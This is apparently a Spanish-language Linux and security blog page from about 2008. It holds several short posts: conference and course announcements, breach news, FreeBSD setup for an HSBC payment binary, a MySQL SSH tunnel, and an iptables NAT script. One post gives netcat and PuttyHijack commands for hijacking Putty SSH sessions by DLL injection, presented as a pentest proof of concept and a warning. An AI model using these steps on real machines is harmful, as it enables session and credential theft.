Top menu

Te gustaría un curso de Linux?

Estamos iniciando la etapa de los cursos de Linux en sus niveles básico, medio y avanzado.

Si estas interesado en un curso danos tu opión de cuanto estarías dispuesto a pagar por el.

Congreso de Seguridad en Computo

"" El “Congreso de Seguridad en Cómputo” 2008 permite reunir a investigadores reconocidos a nivel mundial quienes podrán compartir las nuevas tendencias de la seguridad informática con los distintos asistentes provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado.

Este evento está divido en dos etapas: las Líneas de Especialización en Seguridad Informática enfocadas a cubrir las principales áreas de Seguridad en Cómputo, y el ciclo de Conferencias Magistrales impartidas por reconocidos expertos en seguridad informática que acuden a este magno evento para compartir sus últimas investigaciones y experiencias en el área.

Las Líneas de Especialización en Seguridad Informática se llevarán a cabo del 19 al 24 de septiembre del 2008 y tendrán como sede el Centro de Extensión DGSCA Tlatelolco. Las Conferencias Magistrales tendrán lugar los días 25 y 26 de septiembre del 2008 en el Palacio de Minería.""

Primero Fue Debian, Ahora le toco a Red-Hat

Online intruders hit Red Hat, Fedora Project

PuttyHijack

Esta tool llamada PuttyHijack Su descripción dice mas que mil palabras

"“PuttyHijack is a POC tool that injects a dll into the Putty process to hijack an existing, or soon to be created, connection. This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers.”""

Requerimientos

Windows Machine

Netcat

Putty

PuttyHijack

##Manos a la obra

nc -vv -lp 6666 <<<No Requiere Explicación oh si?

putty.exe cualquier server

PuttyHijack.exe 127.0.0.1 6666

Después de esto estoy seguro que lo pensaran antes de conectarse a sus servidores usando Putty desde cualquier Cyber Cafe

Anexo Screen

PuttyHijack

Instala HSBC CPI Credit Card En FreeBSD

 

Segun el PDF que dan en HSBC se pueden Linux / Solaris/ Windows

http://leadingedgescripts.co.uk/hsbccreditcardslinux.php

Dare por echo que ya esta funcionando cgi-bin en su servidor web

y que ya tenemos habilitado el certificado web que nos piden en hsbc junto con sus permisos correspondientes.

Pero siguiendo todo esos pasos no funciona   Y entonces hay que habilitar el soporte de “Linux Binary Compatibility” en FreeBSD

## 

bash-2.05b$ ldd OrderHash.e 

OrderHash.e:

ELF interpreter /lib/ld-linux.so.2 not found

OrderHash.e: signal 6

bash-2.05b$ ldd Results.e 

Results.e:

ELF interpreter /lib/ld-linux.so.2 not found

Results.e: signal 6

bash-2.05b$ ldd  TestHash.e 

TestHash.e:

ELF interpreter /lib/ld-linux.so.2 not found

TestHash.e: signal 6

bash-2.05b$ file *.e

OrderHash.e: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped

Results.e:   ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped

TestHash.e:  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped

bash-2.05b$ 

Y nuestro servidor es FreeBSD

#kldload linux

Agregamos a  /etc/rc.conf

linux_enable=“YES”

Instalar el Port

cd /usr/ports/emulators/linux_base-fc4

make install distclean

Copiar

cp libCcCpiTools.so  /usr/lib

correr el comando

ldconfig

Luego nuevamente Verificar

ldd *.e

OrderHash.e:

libCcCpiTools.so => /usr/lib/libCcCpiTools.so (0x28067000)

libstdc++-libc6.2-2.so.3 => /usr/lib/libstdc++-libc6.2-2.so.3 (0x28079000)

libm.so.6 => /lib/obsolete/linuxthreads/libm.so.6 (0x280be000)

libc.so.6 => /lib/obsolete/linuxthreads/libc.so.6 (0x280e4000)

libgcc_s.so.1 => /lib/libgcc_s.so.1 (0x28203000)

/lib/ld-linux.so.2 (0x2804a000)

Results.e:

libCcCpiTools.so => /usr/lib/libCcCpiTools.so (0x28067000)

libstdc++-libc6.2-2.so.3 => /usr/lib/libstdc++-libc6.2-2.so.3 (0x28079000)

libm.so.6 => /lib/obsolete/linuxthreads/libm.so.6 (0x280be000)

libc.so.6 => /lib/obsolete/linuxthreads/libc.so.6 (0x280e4000)

libgcc_s.so.1 => /lib/libgcc_s.so.1 (0x28203000)

/lib/ld-linux.so.2 (0x2804a000)

TestHash.e:

libCcCpiTools.so => /usr/lib/libCcCpiTools.so (0x28066000)

libstdc++-libc6.2-2.so.3 => /usr/lib/libstdc++-libc6.2-2.so.3 (0x28078000)

libm.so.6 => /lib/obsolete/linuxthreads/libm.so.6 (0x280bd000)

libc.so.6 => /lib/obsolete/linuxthreads/libc.so.6 (0x280e3000)

libgcc_s.so.1 => /lib/libgcc_s.so.1 (0x28202000)

/lib/ld-linux.so.2 (0x28049000)

#Por ultimo checar nuestros sample.html (previamente ya editado

y configurado)

Remote DNS Cache Poisoning Flaw Exploit

 Link

A parchar Nuestros DNS

Cursos de Seguridad en Redes basado en Ethical Hacking e Investigación forense en Intrusiones Informáticas

¿En qué consiste CEH (Certified Ethical Hacking)?

 

La práctica del hacking ético permite realizar las pruebas de penetración con el fin de indentificar huecos de seguridad en la red así como sistemas corporativos, antes de que un usuario mal intencionado lo haga. La metodología y las técnicas que los hackers utilizan para penetrar a las corporaciones es llevada al campo de la seguridad, con el fin de incluir en los planes organizacionales las auditorias de seguridad necesarias. Esto desde el punto de vista de la protección, permite la elaboración de un plan con el fin de establecer las contramedidas necesarias para salvaguardar la seguridad de la información.

El curso hacking ético le dará a los participantes las habilidades necesarias para realizar la simulación de ataques tal y como son llevados a cabo por usuarios maliciosos, con el fin de identificar brechas de seguridad en los sistemas y redes corporativas, lo cual es vital para establecer un plan que subsane dichas debilidades y vulnerabilidades, y con esto reducir el nivel de riesgo al que están expuestas las organizaciones hoy en día.

¿En qué consiste CHFI (Computer Hacker and Foreinsic Investigator)?

 

La investigación forense de ataques informáticos es el proceso que permite detectar ataques informáticos y extraer la evidencia de manera apropiada para reportar el crimen, llevando a cabo auditorias para prevenir futuros ataques. La computación forense es simplemente la aplicación de la investigación informática y las técnicas de análisis con el interés de determinar evidencia legal. La evidencia podría buscarse en un amplio rango del mal uso de la informática o de crímenes informáticos, incluyendo entre otros el robo de secretos comerciales, robo o destrucción de la propiedad intelectual, y fraude. Los investigadores CHFI dispondrán de una serie de métodos para descubrir los datos que residen en un sistema computacional, o para recuperar archivos de información borrados, dañados o encriptados.

 

También permite la identificación sistemática y cuidadosa de evidencia en una computadora involucrada en algún crimen o caso de abuso. Esto va desde rastrear los pasos de un hacker a través del sistema de un cliente, localizar al autor de correos electrónicos difamatorios, hasta recuperar señales de fraude.

 

El curso investigación forense dará a los participantes las habilidades necesarias para identificar las huellas de un intruso recopilando apropiadamente la evidencia necesaria para procesarlo. Muchas de las herramientas líderes de la industria forense serán aplicadas en el curso, incluyendo software, hardware y técnicas especializadas.

 

Los cursos están dirigidos a personal encargado de la seguridad de la información, auditores, profesionales en seguridad, administradores de sistemas, profesionales con la responsabilidad a su cargo de la integridad en una infraestructura de red, personas que se desempeñan en el área de las Tecnologías de Información, departamentos de Informática o Sistemas, y a todas aquellas personas que deseen adquirir un conocimiento más profundo y práctico acerca de cómo defender sus infraestructuras tecnológicas  de las amenazas actuales. Tienen como finalidad preparar a los asistentes para los exámenes de EC-Council Certified Ethical Hacker (312-50) y EC-Council Computer Hacker and Forensics Investigator (312-49).

 

El objetivo es promover en los asistentes la formación de talentos en seguridad de la información y redes que provean servicios de defensa a las organizaciones contra ataques informáticos, utilizando las herramientas y técnicas aprendidas en base a la legalidad; con la posibilidad de certificarse ante un organismo reconocido por la industria de Tecnologías de Información a nivel mundial.

 

Itinerarios de Cursos en la Universidad del Caribe

 

Curso

Fechas

Costo / Persona

Seguridad en Redes basado en Ethical Hacking

21 – 26 Julio

Lun/Vie: 17 – 22 Hrs

Sáb: 9 – 15 Hrs

$10,000 MN

Investigación forense en Intrusiones Informáticas

28 Julio - 1 Agosto

9 – 17 Hrs

$12,000 MN

 

Incluye:

o      Material didáctico y CD de herramientas

o      Instructores certificados

 

Acceso al laboratorio con las facilidades para realizar las prácticas que requiere el curso, el participante no requiere llevar máquina o software alguno.

 

Conocimientos previos:

o      Conocimiento de redes y protocolos

o      Manejo adecuado de Windows & Linux

o      Manejo de conceptos de seguridad de redes

o      Comprensión oral y escrita del idioma inglés

 

Instructores:

 

Krishna Rajagopal es un experimentado hacker ético, posee más de 50 certificaciones técnicas y es reconocido por cuerpos de seguridad en varios países, así como en instituciones de renombre internacional como la Scotland Yard.

M.Santiago Monterrosa quién también es hacker ético y cuenta con amplia experiencia en el mundo de las Tecnologías de la Información en empresas como IBM entre otras.

Para mayores informes con  mariobenitez@hotmail.com

OpenBSD Local Root Exploit

 

ssh-tunels para mysql

Requerimientos tener acceso ssh en ambos servidores 

Servidor A (Servidor Donde Se encuentran las BD)

Servidor B (Servidor el cual se conectara remotamente a la BD del servidor A)

Si si ya se que se puede sin necesidad de estos tuneles, Pero soy algo paranoico , así que este es mi tutorial  y a alguien mas le servirá.

#En el servidor  B

Ejecutamos esta  comando

bash# ssh -N -f -L 3307:localhost:3306   myuser@servidorA -p  3313  < El proceso se ira a background 

Password:

bash# mysql -P 3307  -u root -h 127.0.0.1  -p   < Aqui solo nosotros nos conectaremos a el puerto que tenemos en el tunel que fue 3307 y listo 

Ya lo demás se lo dejo a su imaginación 

Dudas , Comentarios , Sugerencias a roa@unixmexico.org

Script para crear un NAT entre dispositivos

#!/bin/sh

# Definiendo interfaces interna (lan), externa (inet)

# y programa IPTABLES (iptables)

# Activando reenvio de paquetes en el kernel

echo “1” > /proc/sys/net/ipv4/ip_forward

# Activando medidas de direccionamiento dinamico

echo “1” > /proc/sys/net/ipv4/ip_dynaddr 

lan=eth0

inet=ppp0

NETZ=“192.168.100.0/24”

IPTABLES=“/sbin/iptables”

$IPTABLES -F

$IPTABLES -P INPUT ACCEPT

$IPTABLES -F INPUT

echo -e  “---------------------------------------------------------------\n”

echo -e “NAT en el dispositivo $inet para la red:$NETZ activo!”

$IPTABLES -t nat -A POSTROUTING -o $inet -s $NETZ -j  MASQUERADE

echo -e  “---------------------------------------------------------------\n ”

Páginas: [1] 2 3 ... 6 7 8